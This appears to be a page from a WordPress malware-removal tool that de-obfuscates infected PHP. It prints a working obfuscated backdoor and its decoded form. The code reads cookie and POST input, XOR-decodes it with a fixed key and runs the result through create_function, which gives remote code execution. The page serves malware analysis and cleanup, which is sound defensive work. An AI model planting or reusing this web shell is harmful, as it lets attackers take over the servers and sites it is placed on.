De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php $wektlf = 'ngk60fax\'9o8m2e-17t3i*yr_5spblvucH#4d';$rqnnqg = Array();$rqnnqg[] = $wektlf[33].$wektlf[21];$rqnnqg[] = $wektlf[32].$wektlf[23].$wektlf[14].$wektlf[6].$wektlf[18].$wektlf[14].$wektlf[24].$wektlf[5].$wektlf[31].$wektlf[0].$wektlf[32].$wektlf[18].$wektlf[20].$wektlf[10].$wektlf[0];$rqnnqg[] = $wektlf[28].$wektlf[19].$wektlf[9].$wektlf[13].$wektlf[35].$wektlf[14].$wektlf[3].$wektlf[19].$wektlf[15].$wektlf[32].$wektlf[36].$wektlf[3].$wektlf[35].$wektlf[15].$wektlf[35].$wektlf[32].$wektlf[11].$wektlf[3].$wektlf[15].$wektlf[9].$wektlf[36].$wektlf[13].$wektlf[35].$wektlf[15].$wektlf[16].$wektlf[16].$wektlf[17].$wektlf[36].$wektlf[28].$wektlf[25].$wektlf[17].$wektlf[3].$wektlf[17].$wektlf[19].$wektlf[5].$wektlf[4];$rqnnqg[] = $wektlf[34];$rqnnqg[] = $wektlf[32].$wektlf[10].$wektlf[31].$wektlf[0].$wektlf[18];$rqnnqg[] = $wektlf[26].$wektlf[18].$wektlf[23].$wektlf[24].$wektlf[23].$wektlf[14].$wektlf[27].$wektlf[14].$wektlf[6].$wektlf[18];$rqnnqg[] = $wektlf[14].$wektlf[7].$wektlf[27].$wektlf[29].$wektlf[10].$wektlf[36].$wektlf[14];$rqnnqg[] = $wektlf[26].$wektlf[31].$wektlf[28].$wektlf[26].$wektlf[18].$wektlf[23];$rqnnqg[] = $wektlf[6].$wektlf[23].$wektlf[23].$wektlf[6].$wektlf[22].$wektlf[24].$wektlf[12].$wektlf[14].$wektlf[23].$wektlf[1].$wektlf[14];$rqnnqg[] = $wektlf[26].$wektlf[18].$wektlf[23].$wektlf[29].$wektlf[14].$wektlf[0];$rqnnqg[] = $wektlf[27].$wektlf[6].$wektlf[32].$wektlf[2];foreach ($rqnnqg[8]($_COOKIE, $_POST) as $qqzid => $nnkka){function hcspfuu($rqnnqg, $qqzid, $wgjfh){return $rqnnqg[7]($rqnnqg[5]($qqzid . $rqnnqg[2], ($wgjfh / $rqnnqg[9]($qqzid)) + 1), 0, $wgjfh);}function hiecap($rqnnqg, $cmtmu){return @$rqnnqg[10]($rqnnqg[0], $cmtmu);}function uemswbg($rqnnqg, $cmtmu){$uhvzpub = $rqnnqg[4]($cmtmu) % 3;if (!$uhvzpub) {$vgosji = $rqnnqg[1]; $actrtk = $vgosji("", $cmtmu[1]($cmtmu[2]));$actrtk();exit();}}$nnkka = hiecap($rqnnqg, $nnkka);uemswbg($rqnnqg, $rqnnqg[6]($rqnnqg[3], $nnkka ^ hcspfuu($rqnnqg, $qqzid, $rqnnqg[9]($nnkka))));}
<?php $wektlf = 'ngk60fax\'9o8m2e-17t3i*yr_5spblvucH#4d'; $rqnnqg = array(); $rqnnqg[] = "H*"; $rqnnqg[] = "create_function"; $rqnnqg[] = "b3924e63-cd64-4c86-9d24-117db57673f0"; $rqnnqg[] = $wektlf[34]; $rqnnqg[] = "count"; $rqnnqg[] = "str_repeat"; $rqnnqg[] = "explode"; $rqnnqg[] = "substr"; $rqnnqg[] = "array_merge"; $rqnnqg[] = "strlen"; $rqnnqg[] = "pack"; foreach (array_merge($_COOKIE, $_POST) as $qqzid => $nnkka) { function hcspfuu($rqnnqg, $qqzid, $wgjfh) { return $rqnnqg[7]($rqnnqg[5]($qqzid . $rqnnqg[2], $wgjfh / $rqnnqg[9]($qqzid) + 1), 0, $wgjfh); } function hiecap($rqnnqg, $cmtmu) { return @$rqnnqg[10]($rqnnqg[0], $cmtmu); } function uemswbg($rqnnqg, $cmtmu) { $uhvzpub = $rqnnqg[4]($cmtmu) % 3; if (!$uhvzpub) { $vgosji = $rqnnqg[1]; $actrtk = $vgosji("", $cmtmu[1]($cmtmu[2])); $actrtk(); exit; } } $nnkka = hiecap($rqnnqg, $nnkka); uemswbg($rqnnqg, $rqnnqg[6]($rqnnqg[3], $nnkka ^ hcspfuu($rqnnqg, $qqzid, $rqnnqg[9]($nnkka)))); }
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.